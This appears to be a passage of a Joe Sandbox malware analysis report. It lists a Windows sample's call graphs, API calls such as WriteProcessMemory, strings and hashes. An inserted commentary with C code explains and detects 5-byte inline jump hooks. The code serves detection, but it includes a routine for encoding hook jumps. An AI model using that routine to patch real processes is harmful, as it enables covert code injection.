• cef118 -> d86710 -> cef53c -> ceacc0 -> d89c2c -> d87b98 -> d87d45 KiUserCallbackDispatcher; d3d288 and d3d2a4: GetFileVersionInfoSizeW, GetFileVersionInfoW
• addc44 -> adc184 -> adc13c -> add3b4 -> add290 -> adc97c -> adc860 (6 API calls)
• adee44 -> ad9498 -> ad942c -> dab794 -> cf92fc -> cf9322 GlobalAddAtomW; cf9070: SetErrorMode (cf907f, cf90b2); d8cb1c -> d8cffc -> d8d032 LoadCursorW; d8d5d8 -> d8d66c SystemParametersInfoW; d8e394 -> d8e4a7 LoadIconW
• ddaa66 (__DllMainCRTStartup@12) -> dda970 (_realloc) -> dda83b (___DllMainCRTStartup, 28 API calls): dde1b4 HeapCreate; dde1e4 HeapFree, HeapFree; ddb615 TlsGetValue x3, TlsSetValue, _doexit; ddb59a TlsGetValue, TlsGetValue, __onexit_nolock; dda861 __RTC_Initialize; ddd6af __calloc_impl; dddf76 ___initmbctable; ddd9ff, dddcb0, ddda5c, dddcfe, ddd838, ddb649, ddb99d, ddb92f, ddb686, ddaa89, dde031 (CRT helpers, 7 to 16 API calls each)
• dcb7b0 -> dcb7e2 WriteProcessMemory
• daa114 -> daa1a8 GetNativeSystemInfo
• cfa110 -> cfa304 -> cfa26c -> cf99a4 -> cf5af0 -> cecae4 RegOpenKeyExW

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GlobalAddAtomW.KERNEL32(00000000), ref: 00CF9350
                                                                        • Part of subcall function 00CF9070: SetErrorMode.KERNELBASE(00008000), ref: 00CF9084
                                                                        • Part of subcall function 00CF9070: SetErrorMode.KERNELBASE(?,00CF90D0), ref: 00CF90C3
                                                                        • Part of subcall function 00D8E394: LoadIconW.USER32(00DB4040,MAINICON,?,?,?,00CF9410), ref: 00D8E4BC
                                                                      Strings
                                                                      • AnimateWindow
                                                                      • ControlOfs%.8X%.8X
                                                                      • Delphi%.8X
                                                                      • DelphiRM_GetObjectInstance
                                                                      • USER32
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AtomGlobalIconLoad
                                                                      • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                      • API String ID: 1953398334-1139167764
                                                                      • Opcode ID: 436daa5087e223eb94259e9fd494686485b6d2001fe1261e8da69bd86f478e1e
                                                                      • Instruction ID: 8df992afad4a268e953f7703b91a98d0ae380de1b0df5a6a184ff2694b778ebb
                                                                      • Opcode Fuzzy Hash: 436daa5087e223eb94259e9fd494686485b6d2001fe1261e8da69bd86f478e1e
                                                                      • Instruction Fuzzy Hash: 82416D74600389DBCB40FFB8ED92AAEB7F4EB18304B404565F615DB361EE349A058B71

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • __mtterm.LIBCMT ref: 00DDA8F1
                                                                        • Part of subcall function 00DDE1B4: HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00DDA850,?), ref: 00DDE1CA
                                                                      • __RTC_Initialize.LIBCMT ref: 00DDA86C
                                                                      • __mtterm.LIBCMT ref: 00DDA88F
                                                                        • Part of subcall function 00DDB649: TlsFree.KERNEL32(00DEC65C,00DDA8F6), ref: 00DDB674
                                                                      • __setenvp.LIBCMT ref: 00DDA89F
                                                                      • __cinit.LIBCMT ref: 00DDA8AA
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00DDA902
                                                                        • Part of subcall function 00DDB615: TlsGetValue.KERNEL32(?,00DDB784), ref: 00DDB61E
                                                                        • Part of subcall function 00DDB615: TlsSetValue.KERNEL32(00000000), ref: 00DDB63F
                                                                        • Part of subcall function 00DDD6AF: __calloc_impl.LIBCMT ref: 00DDD6C0
                                                                      • __freeptd.LIBCMT ref: 00DDA961
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value__mtterm$CreateFreeHeapInitialize___set_flsgetvalue__calloc_impl__cinit__freeptd__setenvp
                                                                      • String ID:
                                                                      • API String ID: 3186663487-0
                                                                      • Opcode ID: 4ec0c534a04deebaef199423d145f8cbdf7afd2c4b8c55c1e52647b317ebfb2b
                                                                      • Instruction ID: 3c21dbf71f55fb04dcca8272b6dc2504fa9db0117875a89fd971f338e5aa9d33
                                                                      • Opcode Fuzzy Hash: 4ec0c534a04deebaef199423d145f8cbdf7afd2c4b8c55c1e52647b317ebfb2b
                                                                      • Instruction Fuzzy Hash: CE21D131544382D99E2537BDAC1262A3359DF90364B6AC42BFD55C9382EF20C842AA73

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks dd9748 to dd9a88; calls ddc0b6 (_malloc), ddc18f, dd9994, ddc050, dd99e1, ddc1b7
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00DD9A18
                                                                        • Part of subcall function 00DDC0B6: __FF_MSGBANNER.LIBCMT ref: 00DDC0D9
                                                                        • Part of subcall function 00DDC0B6: __NMSG_WRITE.LIBCMT ref: 00DDC0E0
                                                                        • Part of subcall function 00DDC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00DDC12D
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00DD9A3B
                                                                        • Part of subcall function 00DD9994: std::exception::exception.LIBCMT ref: 00DD99A0
                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00DD9A4F
                                                                      Strings
                                                                      • PU'
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                      • String ID: PU'
                                                                      • API String ID: 832318072-4254717615
                                                                      • Opcode ID: 5a2cd519584e8dd6040d3318d1848ebee6fb4cecd52bccd2a4edf43e8a90d7c1
                                                                      • Instruction ID: 09b50b1e38959e9f3ded025042075f562d760258b025f6c058daec71d9ef1d52
                                                                      • Opcode Fuzzy Hash: 5a2cd519584e8dd6040d3318d1848ebee6fb4cecd52bccd2a4edf43e8a90d7c1
                                                                      • Instruction Fuzzy Hash: 6F014C3340434A6A8F24B766D8329B9B798CB40368B587027F8499B386DA73DD41C7B1

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks d8d1a8 to d8d352; calls cf9244, then RegOpenKeyExW (d8d22b)
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00D8D266
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00D8D250
                                                                      • layout text, xrefs: 00D8D297
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                      • API String ID: 71445658-2652665750
                                                                      • Opcode ID: f480718178c0309893974c14d822517d70219cfb520d9a990718f5816f0bb0a0
                                                                      • Instruction ID: aeb8058bb98e64d5a5dd4937cd6e8dca934e904495e84c1d485596ae7c22a8ea
                                                                      • Opcode Fuzzy Hash: f480718178c0309893974c14d822517d70219cfb520d9a990718f5816f0bb0a0
                                                                      • Instruction Fuzzy Hash: A6410875A00209AFDB11EF94CA81BAEB7F9EB49700F5040A5E904E7391E770EF04CB62

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks cf9070 to cf90d2; SetErrorMode at cf907f and again at cf90b2
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008000), ref: 00CF9084
                                                                      • SetErrorMode.KERNELBASE(?,00CF90D0), ref: 00CF90C3
                                                                      Strings
                                                                      • imm32.dll
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID: imm32.dll
                                                                      • API String ID: 2340568224-1815517138
                                                                      • Opcode ID: 003f145bfca057ca65303b32c1c59b8b3a5d948b31892ecc8f1900fd31cdbdde
                                                                      • Instruction ID: 6590ea6e6c608edcd5c6c10ee4f9dd5c66380cd1dacbd35abd0a402e6566ddde
                                                                      • Opcode Fuzzy Hash: 003f145bfca057ca65303b32c1c59b8b3a5d948b31892ecc8f1900fd31cdbdde
                                                                      • Instruction Fuzzy Hash: 43F0E276508348EFDF51EB65E91AB3577E8D349710FE180A5F208836A0DE759900DB35

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks d8e394 to d8e5f3; calls cca890, cd3ea0, LoadIconW, cd4338 (all in block d8e40c), then d83c28, d8e7d8, d91304, d91f70
                                                                      APIs
                                                                      • LoadIconW.USER32(00DB4040,MAINICON,?,?,?,00CF9410), ref: 00D8E4BC
                                                                      Strings
                                                                      • MAINICON
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: MAINICON
                                                                      • API String ID: 2457776203-2283262055
                                                                      • Opcode ID: 52d1538f10f52f7eb4e4fb8d4581c503e8e3937deae28ad740a62784629a8355
                                                                      • Instruction ID: 604a7de48831b2648df40f73dfdafd3a5917997420149104a39e68b524f7019c
                                                                      • Opcode Fuzzy Hash: 52d1538f10f52f7eb4e4fb8d4581c503e8e3937deae28ad740a62784629a8355
                                                                      • Instruction Fuzzy Hash: E2612870A04384CFDB40EF28D98AB9A3BE5AF15304F0845B9E808CF357DBB599488B71

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks afaf3c to afb011; GetFileVersionInfoSizeW at entry, then either exit (afaffc) or GetFileVersionInfoW (afaf89)
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 00AFAF7E
                                                                      • GetFileVersionInfoW.KERNELBASE(00000000), ref: 00AFAFB3
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AEB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_aeb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$Size
                                                                      • String ID:
                                                                      • API String ID: 2104008232-0
                                                                      • Opcode ID: a0465724b847056d05c0cad38d6f28ca1a536f1d9e9199c38b2a299e056e3e40
                                                                      • Instruction ID: 6d2fc651c7ccb7400f484cc6c6838e896f453d7760e662687a9f6deb5a28fe33
                                                                      • Opcode Fuzzy Hash: a0465724b847056d05c0cad38d6f28ca1a536f1d9e9199c38b2a299e056e3e40
                                                                      • Instruction Fuzzy Hash: 28213CB1A10209AFDB11EFE5CD928AEB7FCEB48710B514971B614E3651EB34AE00DA21

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks dcb7a5 to dcb80b; Wow64SuspendThread at entry, then either exit (dcb805) or WriteProcessMemory (dcb7e2)
                                                                      APIs
                                                                      • Wow64SuspendThread.KERNEL32 ref: 00DCB7A5
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00DCB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DCB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DCB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dcb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessSuspendThreadWow64Write
                                                                      • String ID:
                                                                      • API String ID: 2345646855-0
                                                                      • Opcode ID: b7a10879d2066c743689e0833f586f0bbe6c42a46d3e97db13997739e3d29073
                                                                      • Instruction ID: 003cb0afa001532189881a9a274459547ff39cb749068a4097b9bb9d0c70913f
                                                                      • Opcode Fuzzy Hash: b7a10879d2066c743689e0833f586f0bbe6c42a46d3e97db13997739e3d29073
                                                                      • Instruction Fuzzy Hash: 56F0593060010E26EB18987CEC06FEDBA9BCFC1630F298329B924C75D4E630880442A1
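The dcb7a5 routine above suspends a WOW64 thread and then calls WriteProcessMemory with 00000005 among its listed arguments, consistent with a 5-byte write into another process. Five bytes is exactly the size of an x86 `E9 rel32` near jump, which is how an inline hook is normally planted and is the behaviour behind the report's "Overwrites code with unconditional jumps" signature. The following C block is an added example, not code from the sample or from Joe Sandbox: it encodes such a jump for a given source and target address, and checks a function's first bytes against a known-good copy, resolving the jump target so an analyst can confirm where a patched function actually lands. The addresses (0x77E10000, 0x00DCB7A5) and the prologue bytes are constructed for the example and are not taken from the report.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define JMP_REL32_LEN 5   /* E9 xx xx xx xx: the 5-byte size seen in the WriteProcessMemory call */

/* Encode an x86 near jump from 'from' to 'to' into out[5].
 * rel32 is relative to the end of the instruction, i.e. from + 5;
 * unsigned arithmetic wraps correctly for backward jumps. */
void encode_jmp_rel32(uint32_t from, uint32_t to, uint8_t out[JMP_REL32_LEN]) {
    uint32_t rel = to - (from + JMP_REL32_LEN);
    out[0] = 0xE9;
    out[1] = (uint8_t)(rel);
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/* If the bytes in 'code' (located at 'addr') start with an E9 jump, return 1
 * and store the absolute jump target in *target; otherwise return 0. */
int detect_jmp_rel32(uint32_t addr, const uint8_t *code, size_t len, uint32_t *target) {
    if (len < JMP_REL32_LEN || code[0] != 0xE9) return 0;
    uint32_t rel = (uint32_t)code[1] | ((uint32_t)code[2] << 8) |
                   ((uint32_t)code[3] << 16) | ((uint32_t)code[4] << 24);
    *target = addr + JMP_REL32_LEN + rel;
    return 1;
}

/* Inline-hook check: compare the live prologue with a known-good copy (e.g. the
 * bytes read from the DLL on disk). Returns 0 = clean, 1 = patched with a jump
 * (target set), 2 = patched in some other way. */
int check_prologue(uint32_t addr, const uint8_t *live, const uint8_t *clean,
                   size_t len, uint32_t *target) {
    if (memcmp(live, clean, len) == 0) return 0;
    if (detect_jmp_rel32(addr, live, len, target)) return 1;
    return 2;
}

/* Encode a jump and decode it again; returns the recovered target (used to
 * confirm the rel32 arithmetic, including the wrap-around for backward jumps). */
uint32_t roundtrip_target(uint32_t from, uint32_t to) {
    uint8_t buf[JMP_REL32_LEN];
    uint32_t target = 0;
    encode_jmp_rel32(from, to, buf);
    detect_jmp_rel32(from, buf, sizeof buf, &target);
    return target;
}

/* Demo with constructed data: a typical Win32 x86 prologue
 * (mov edi,edi; push ebp; mov ebp,esp; sub esp,10h) at a made-up address
 * 0x77E10000, hooked to a made-up address 0x00DCB7A5. Returns 1 when the
 * patch is recognised as a jump and the target is recovered correctly. */
int demo_hook_detect(void) {
    const uint8_t clean[8] = {0x8B,0xFF,0x55,0x8B,0xEC,0x83,0xEC,0x10};
    uint8_t live[8];
    uint32_t target = 0;
    memcpy(live, clean, sizeof live);
    encode_jmp_rel32(0x77E10000u, 0x00DCB7A5u, live);   /* the 5-byte overwrite */
    int r = check_prologue(0x77E10000u, live, clean, sizeof live, &target);
    if (r == 1) printf("hooked: first instruction is jmp %08x\n", target);
    return r == 1 && target == 0x00DCB7A5u;
}

/* Same prologue, unpatched: check_prologue must report it clean (0). */
int demo_clean_prologue(void) {
    const uint8_t clean[8] = {0x8B,0xFF,0x55,0x8B,0xEC,0x83,0xEC,0x10};
    uint32_t target = 0;
    return check_prologue(0x77E10000u, clean, clean, sizeof clean, &target);
}

int main(void) { return demo_hook_detect() ? 0 : 1; }
```

In a live triage the "clean" bytes come from the module on disk (or a reference system) and the "live" bytes from reading the hooked process; the only arithmetic that matters is that rel32 is taken from the end of the 5-byte instruction, which is why a backward jump such as the one in the demo wraps modulo 2^32.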

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks edcbc0 to edcd0f; no API calls
                                                                      Strings
                                                                      • P
                                                                      • t
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2545064061.0000000000EDC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EDC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_edc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P$t
                                                                      • API String ID: 0-897426209
                                                                      • Opcode ID: 7fa334fd72bc3d5bf1f73fcfde9ad3b1c31ef972c005667e9749b4e90cf11852
                                                                      • Instruction ID: 24bf71fbd262e37e70b2fcfd84e4c8583413de69b83a8ec33843b13707be6b86
                                                                      • Opcode Fuzzy Hash: 7fa334fd72bc3d5bf1f73fcfde9ad3b1c31ef972c005667e9749b4e90cf11852
                                                                      • Instruction Fuzzy Hash: 3641DF719117438FC7168B3889895D9FF91FF523A4728166EC1D6972D2C7214487CBC5

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks d87b98 to d87dc7; calls d8cee4, d796d4, d8ced0, cf2cf8, cf2928, KiUserCallbackDispatcher (d87d3c), d3d2a4, d87ad0, d895c0, ceab94
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00D87DC8), ref: 00D87D46
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: b7f7605a12a6f1833b457f9fd19f5e057958b6d1279250ba30856c1a6b55330a
                                                                      • Instruction ID: 4fe4f7674b1df6ec97413a6a125fc55b067316f141a62de0ef2d35d2b1f142ab
                                                                      • Opcode Fuzzy Hash: b7f7605a12a6f1833b457f9fd19f5e057958b6d1279250ba30856c1a6b55330a
                                                                      • Instruction Fuzzy Hash: 2051BA317083449BDB61BF38C889BAA7695AF05304F2C95B9FC419B297CAB4CC898770

                                                                      Control-flow Graph

                                                                      • Control-flow graph (figure in the original): basic blocks daa114 to daa3c4; GetNativeSystemInfo at daa1a8, followed by a large branch table with no further API calls
                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00DAA1AD
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000DAA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DAA000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_daa000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID:
                                                                      • API String ID: 1721193555-0
                                                                      • Opcode ID: 6b1d80010840633bb8c4f106edc73296cb7801a1e81c76ab6e9fe03435e6b3ad
                                                                      • Instruction ID: 70b42f46d5ee8bfd336db92f769ec8503d3544e758e20d68c7707701da06a3fe
                                                                      • Opcode Fuzzy Hash: 6b1d80010840633bb8c4f106edc73296cb7801a1e81c76ab6e9fe03435e6b3ad
                                                                      • Instruction Fuzzy Hash: AA616031608344DBCB24DB6CDA416AA77E5BB86300F644B2BE086CB365DB79D945CB33

                                                                      Control-flow Graph (rendered graph and edge data omitted)
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00D7F730,?,00D8CC47,00000000,00000000,00D8783C,6E6F4646,?,?,00000000), ref: 00D8D681
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 37778235410df5e2e27e13e5713b6de0d0e5c650dde221ee947484dc44bf84f6
                                                                      • Instruction ID: 2740b23b9697359a4438d6cc8393922945ce99f33c1d42108287209475b84ba0
                                                                      • Opcode Fuzzy Hash: 37778235410df5e2e27e13e5713b6de0d0e5c650dde221ee947484dc44bf84f6
                                                                      • Instruction Fuzzy Hash: DF415C31600248ABDB50FF78DD8AFAA33E9AB09700F1440B5B90CDB396EE319D458B75
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00DCB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DCB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DCB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dcb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 1bd102d9b38021d0846288fdb63313cc0bd198b63639c95b7f010267bc66bdcc
                                                                      • Instruction ID: 82500cae2ab3cfac8424c8ef9484fb1db4d51fb18100eb004315a8f25fd0d220
                                                                      • Opcode Fuzzy Hash: 1bd102d9b38021d0846288fdb63313cc0bd198b63639c95b7f010267bc66bdcc
                                                                      • Instruction Fuzzy Hash: 6DF02B3174010E26DB144C7CAC02FEDB79ACFC2630F19436AF914C71D4E670880542A1
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00000000,?,?,?,00D7F730,00D8CB5F,?,?,00000000,?,00CF93F0), ref: 00D8D036
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CursorLoad
                                                                      • String ID:
                                                                      • API String ID: 3238433803-0
                                                                      • Opcode ID: 5f61bfa78244d89efdd4d69a9df9932b104010c37684e37f28287ebf50b090ea
                                                                      • Instruction ID: fdddc8f3307d4d1f4043989069302c574696d03acec621458ddb8df8ac39cfb0
                                                                      • Opcode Fuzzy Hash: 5f61bfa78244d89efdd4d69a9df9932b104010c37684e37f28287ebf50b090ea
                                                                      • Instruction Fuzzy Hash: C8F0A0526052405B9A206A7E4CC5E7A738ACF86730F300376FA2AC72D1CA256C0607B0
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00CE94EB
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                      • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                      • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                      • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00DDA850,?), ref: 00DDE1CA
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: 5292a1726a454128f0bad3e3b986ae7df4f1d6d171bbf6021e8b173b74069136
                                                                      • Instruction ID: 56bb9c67766d6cd2dabd22a94eef46ce51b0f6105dba9299fef37db45e3491d9
                                                                      • Opcode Fuzzy Hash: 5292a1726a454128f0bad3e3b986ae7df4f1d6d171bbf6021e8b173b74069136
                                                                      • Instruction Fuzzy Hash: 06D05E73A503456DEB20AF746D04B363BCC9784395F048836F80CCA650E674D940C220
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00DD9A18
                                                                        • Part of subcall function 00DDC0B6: __FF_MSGBANNER.LIBCMT ref: 00DDC0D9
                                                                        • Part of subcall function 00DDC0B6: __NMSG_WRITE.LIBCMT ref: 00DDC0E0
                                                                        • Part of subcall function 00DDC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00DDC12D
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_malloc
                                                                      • String ID:
                                                                      • API String ID: 501242067-0
                                                                      • Opcode ID: 323aceba6085630cbbd5596d4d5b77c1767793af26893b7f0b52c0e9e1e2273c
                                                                      • Instruction ID: 57b1f1caf9a30129cf39a614246a7c15e06498e1478157ad1c79a8bec0a8ea11
                                                                      • Opcode Fuzzy Hash: 323aceba6085630cbbd5596d4d5b77c1767793af26893b7f0b52c0e9e1e2273c
                                                                      • Instruction Fuzzy Hash: 52D09722008185E1CE24FAB8DC6F837B68C8940384304202BBC4869B46EE22E409C1B2
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DC4000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC4000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dc4000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 588746909cfa64d80144b76e8fd91b7856a82ff47f490b7588349f52eb20acb1
                                                                      • Instruction ID: ea9029c0a3fb809d2d1478c6fb3ad14a296d762ac169b6e21d2c441f4850191f
                                                                      • Opcode Fuzzy Hash: 588746909cfa64d80144b76e8fd91b7856a82ff47f490b7588349f52eb20acb1
                                                                      • Instruction Fuzzy Hash: FD31CE790187188BC309EF5AD4600BAB7D5FB94300F50462CEED3472A2EF756467CA92
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2545064061.00000000011F2000.00000020.00000001.01000000.00000007.sdmp, Offset: 011F2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_11f2000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf4d2842a17e884762e2ba3b62d4c2161b49aa09bb580ee751a4a0e5e11d6f7e
                                                                      • Instruction ID: f715083a31002233e32fc72270bc9542b72aaed9e2c28978d23746f008ec45ca
                                                                      • Opcode Fuzzy Hash: bf4d2842a17e884762e2ba3b62d4c2161b49aa09bb580ee751a4a0e5e11d6f7e
                                                                      • Instruction Fuzzy Hash: 2301DC31118B0D4F430DBEA8948807A3285EB96321F65862ED687C30A6DB735423C682
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2545064061.0000000000EDC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EDC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_edc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 141a431efda3f275782b9303e2120bd369db4d46ed3f9551b093f6bc813fa1b9
                                                                      • Instruction ID: 4c05fa6a51c9fac5c4c47459151aa23ac051102ac7dddda15e05ecbaea80d435
                                                                      • Opcode Fuzzy Hash: 141a431efda3f275782b9303e2120bd369db4d46ed3f9551b093f6bc813fa1b9
                                                                      • Instruction Fuzzy Hash: A8D097A2C0420307AB0C3A3418264CBB781DAA326CB20610D820386261EB380086CA57
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2582215840.0000000001F5A000.00000020.00000001.01000000.00000007.sdmp, Offset: 01F5A000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
